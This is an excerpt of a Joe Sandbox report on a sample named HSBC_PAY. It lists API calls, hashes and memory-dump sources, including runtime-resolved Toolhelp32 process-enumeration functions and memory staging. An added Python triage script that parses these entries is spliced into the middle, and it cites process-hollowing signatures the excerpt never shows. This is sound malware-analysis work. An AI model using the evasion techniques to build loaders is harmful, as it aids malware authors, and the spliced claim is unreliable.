                                                                    • Instruction ID: 54e0babc6b6bf637b772546a784d6a8879bebbfea7f3f8bb63afba85473b2a43
                                                                    • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                    • Instruction Fuzzy Hash: 1AC012F264033547EB216B989CC0756A2CCDB092A5F5400A1D508D7240FB609C004765
                                                                    APIs
                                                                    • timeSetEvent.WINMM(00002710,00000000,02AABB3C,00000000,00000001), ref: 02AABB58
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Eventtime
                                                                    • String ID:
                                                                    • API String ID: 2982266575-0
                                                                    • Opcode ID: ac260ef4c3da0738f1eecdb15af9c0921ba69932f71e1caebaf81fb04141c893
                                                                    • Instruction ID: d5a31c538bdf0c3fe790caeaa836bff69884141838cb0c02836e291036d4a936
                                                                    • Opcode Fuzzy Hash: ac260ef4c3da0738f1eecdb15af9c0921ba69932f71e1caebaf81fb04141c893
                                                                    • Instruction Fuzzy Hash: DBC092F07D23403EFA20A6A81CE2F63158ED714B14F600812BB00FF2C2EAE258505A34
                                                                    APIs
                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02A84BEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AllocString
                                                                    • String ID:
                                                                    • API String ID: 2525500382-0
                                                                    • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                    • Instruction ID: a15aa7979b8cee1dfe2d4d808eadf637971b7eab6984e00590ccb4ef5e7996c5
                                                                    • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                    • Instruction Fuzzy Hash: 01B0123C28830358FA5033610E84F7204DC1B542CBF8400A19F28CC0C0FF04C4018833
                                                                    APIs
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02A84C03
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString
                                                                    • String ID:
                                                                    • API String ID: 3341692771-0
                                                                    • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                    • Instruction ID: 2fc1536329bc4afcb12f4e68d5c181af3c8377ab0fd347a8861268c1b6bf457a
                                                                    • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                    • Instruction Fuzzy Hash: C8A022FC8803030ACF0B332E028002A20BB3FF03003CAC0F802000A000AF3A8000AE30
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02A81FC1), ref: 02A816A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 4ea2c2476e1a339de202ed5d5f7c1001d9b2791fddd3cb376aef400434bb93df
                                                                    • Instruction ID: ade7f81ffa0300ab6126ebcb4855fc24eb332796699cf099e1a68ee044e707c2
                                                                    • Opcode Fuzzy Hash: 4ea2c2476e1a339de202ed5d5f7c1001d9b2791fddd3cb376aef400434bb93df
                                                                    • Instruction Fuzzy Hash: 75F096B2B40B55ABD7109F599C81742BB94FB00314F050139E588AB340DBB098128FD4
                                                                    APIs
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02A81FE4), ref: 02A81704
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: daae0463706a4bd9281f80ac0f4f12d3a1534575e83ebd5ec01fa24867465837
                                                                    • Instruction ID: 0c413ff8638695be87bab223f732e1b6f0fbeefca2ab815b474d80561ef3deaf
                                                                    • Opcode Fuzzy Hash: daae0463706a4bd9281f80ac0f4f12d3a1534575e83ebd5ec01fa24867465837
                                                                    • Instruction Fuzzy Hash: 33E08675340301EFD7106B795D80712BBD8EB44654F144479F589DB241EAA0E8128F60
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02A9ABDB,?,?,02A9AC6D,00000000,02A9AD49), ref: 02A9A968
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02A9A980
                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02A9A992
                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02A9A9A4
                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02A9A9B6
                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02A9A9C8
                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02A9A9DA
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02A9A9EC
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02A9A9FE
                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02A9AA10
                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02A9AA22
                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02A9AA34
                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02A9AA46
                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02A9AA58
                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02A9AA6A
                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02A9AA7C
                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02A9AA8E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                    • API String ID: 667068680-597814768
                                                                    • Opcode ID: 0d3a56ff6cd36b87c1b0926fddba2d017ca1b3aea3c4c0ccd47477962535518c
                                                                    • Instruction ID: cb15384628f0f40e9d55e49b3f369a8432e46b599302a992e7fc832597a5aba7
                                                                    • Opcode Fuzzy Hash: 0d3a56ff6cd36b87c1b0926fddba2d017ca1b3aea3c4c0ccd47477962535518c
                                                                    • Instruction Fuzzy Hash: 063138B0AC1770EFFF15AFB5D985A2637E9BB05B00B000966A506CF605EE74DC528FA1
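The VirtualAlloc/VirtualFree stubs above and the resolver that fetches the whole Toolhelp32 family through GetModuleHandleA/GetProcAddress are the two kinds of entry in this run that a triager acts on: the first shows how the loader stages memory, the second shows enumeration APIs kept out of the import table so static import analysis misses them. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample's code. It parses lines in the report's own `• API.MODULE(args), ref: addr` shape, groups them per "APIs" entry, lists the names each entry resolves at runtime, and decodes the VirtualAlloc flag words the report prints as hex (00101000 is MEM_COMMIT|MEM_TOP_DOWN, 00000004 is PAGE_READWRITE). The embedded sample lines are copied from the entries above; the Win32 constant tables are standard, and the split into three entries is constructed for the demo.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report (added example)."""
import re

# One report line: "• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02A9A9EC"
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Win32 constants for VirtualAlloc's flAllocationType and flProtect arguments.
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
               0x100000: "MEM_TOP_DOWN", 0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}
PROTECTS = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
            0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Names worth flagging when resolved via GetProcAddress: the Toolhelp32 family is how a
# loader walks processes/threads/modules, e.g. to pick a host for injection.
TOOLHELP32 = {"CreateToolhelp32Snapshot", "Process32First", "Process32Next", "Process32FirstW",
              "Process32NextW", "Thread32First", "Thread32Next", "Module32First", "Module32Next",
              "Module32FirstW", "Module32NextW", "Heap32First", "Heap32Next", "Heap32ListFirst",
              "Heap32ListNext", "Toolhelp32ReadProcessMemory"}

# Constructed input: API lines copied from the report entries above, grouped into three entries.
SAMPLE = """\
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02A81FC1), ref: 02A816A4
Memory Dump Source
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02A81FE4), ref: 02A81704
Memory Dump Source
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02A9ABDB,?,?,02A9AC6D,00000000,02A9AD49), ref: 02A9A968
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02A9A980
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02A9A9EC
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02A9A9FE
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02A9AA34
Strings
"""


def parse_entries(text):
    """Group API call lines by report entry; an entry starts at a line reading 'APIs'."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"calls": []}
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m.group("args").split(",")]
            current["calls"].append({"api": m.group("api"), "module": m.group("module"),
                                     "args": args, "ref": int(m.group("ref"), 16)})
    return entries


def resolved_imports(entry):
    """Function names the entry passes to GetProcAddress (the first non-numeric argument)."""
    names = []
    for call in entry["calls"]:
        if call["api"] != "GetProcAddress":
            continue
        for a in call["args"][1:]:
            if a != "?" and not re.fullmatch(r"[0-9A-Fa-f]{8}", a):
                names.append(a)
                break
    return names


def decode_virtualalloc(args):
    """Map VirtualAlloc's flAllocationType and flProtect hex args to their Win32 names."""
    try:
        alloc, protect = int(args[2], 16), int(args[3], 16)
    except (ValueError, IndexError):
        return [], "?"  # the report prints '?' when it could not recover the value
    alloc_names = [name for bit, name in sorted(ALLOC_TYPES.items()) if alloc & bit]
    return alloc_names, PROTECTS.get(protect, hex(protect))


def triage(text):
    """Return one finding string per observation worth a second look."""
    findings = []
    for i, entry in enumerate(parse_entries(text)):
        hits = sorted(TOOLHELP32.intersection(resolved_imports(entry)))
        for call in entry["calls"]:
            if call["api"] == "VirtualAlloc":
                alloc, prot = decode_virtualalloc(call["args"])
                rwx = " (RWX: unpacking/injection staging)" if prot == "PAGE_EXECUTE_READWRITE" else ""
                findings.append(f"entry {i}: VirtualAlloc {'|'.join(alloc)} {prot} at {call['ref']:08X}{rwx}")
        if hits:
            findings.append(f"entry {i}: resolves {len(hits)} Toolhelp32 API(s) at runtime "
                            f"({', '.join(hits)}): enumeration imports absent from the IAT")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Run it over the "APIs" blocks of a saved report to get a compact list of memory-staging calls with decoded flags and of runtime-resolved enumeration APIs; a PAGE_EXECUTE_READWRITE allocation is called out separately because that is the usual precursor to the process-hollowing behaviour the report's signatures list.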
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A858D1
                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02A858E8
                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 02A85918
                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A8597C
                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A859B2
                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A859C5
                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A859D7
                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A859E3
                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000), ref: 02A85A17
                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8), ref: 02A85A23
                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02A85A45
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                    • API String ID: 3245196872-1565342463
                                                                    • Opcode ID: 43daf681605505677927f10ee362628d7afc1999602cfc11459fb040b9c7fd2c
                                                                    • Instruction ID: a6b2fd6b3bd606f444dae52d22d4e6edfccb5f7984513e4d3df341d2dc38d26d
                                                                    • Opcode Fuzzy Hash: 43daf681605505677927f10ee362628d7afc1999602cfc11459fb040b9c7fd2c
                                                                    • Instruction Fuzzy Hash: 63418E71D40218AFDB10EBE8CDC8AEEB3BDAF08310F4545A5A958E7241EB309B458F54
                                                                    APIs
                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A85B94
                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A85BA1
                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A85BA7
                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A85BD2
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A85C19
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A85C29
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A85C51
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A85C61
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A85C87
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A85C97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                    • API String ID: 1599918012-2375825460
                                                                    • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                    • Instruction ID: 3ce2e941c197f0372b90095c426e6499db8e69afb740b59f6d1324c651815ff6
                                                                    • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                    • Instruction Fuzzy Hash: 913187B1E4021C2AEB25EAB4DC85FEFB7AD5B04380F4501F19A48E6181FF749E448F91
                                                                    APIs
                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02A87F75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1705453755-0
                                                                    • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                    • Instruction ID: 364afdc89b2573b91861b8251fd3c3bfaf2f7640b844dec2be6f563d696218d8
                                                                    • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                    • Instruction Fuzzy Hash: F311C0B5E00209AFDB04DF99C981DAFF7F9EFC8704B14C569A505EB254E6719E01CB90
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A8A762
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                    • Instruction ID: dd530821664c06a48c2a1219b756c64ddb3264b014a839b557647a4e3176d1ba
                                                                    • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                    • Instruction Fuzzy Hash: A6E0D83570021457D315B5685D80AFA73AD975C710F00417FBD05C7341FDB09D404EE8
                                                                    APIs
                                                                    • GetVersionExA.KERNEL32(?,02AAC106,00000000,02AAC11E), ref: 02A8B71A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Version
                                                                    • String ID:
                                                                    • API String ID: 1889659487-0
                                                                    • Opcode ID: 1c92c4e586a644b6b4a09bc3d43617e0838dd65bd89985712888fb688397a404
                                                                    • Instruction ID: ff2425a8b6eaddc815bd0f04352a3d617af402a010a09fde6de5a0a170432a41
                                                                    • Opcode Fuzzy Hash: 1c92c4e586a644b6b4a09bc3d43617e0838dd65bd89985712888fb688397a404
                                                                    • Instruction Fuzzy Hash: CAF09D74944B02DFD359EF28D580A2677E5FB48B14F008929E8D8C7B80EB34D826CF66
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02A8BDF2,00000000,02A8C00B,?,?,00000000,00000000), ref: 02A8A7A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                    • Instruction ID: 7e43b542e6d912dfb897269a0b519b8374b09f3c73fe66ae55ae5f5277551b95
                                                                    • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                    • Instruction Fuzzy Hash: 0BD05EA730E2A06AA324A15A2D84D7B5AFCCBC57A1F00403EF588C6201D6008C06A6F1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmp
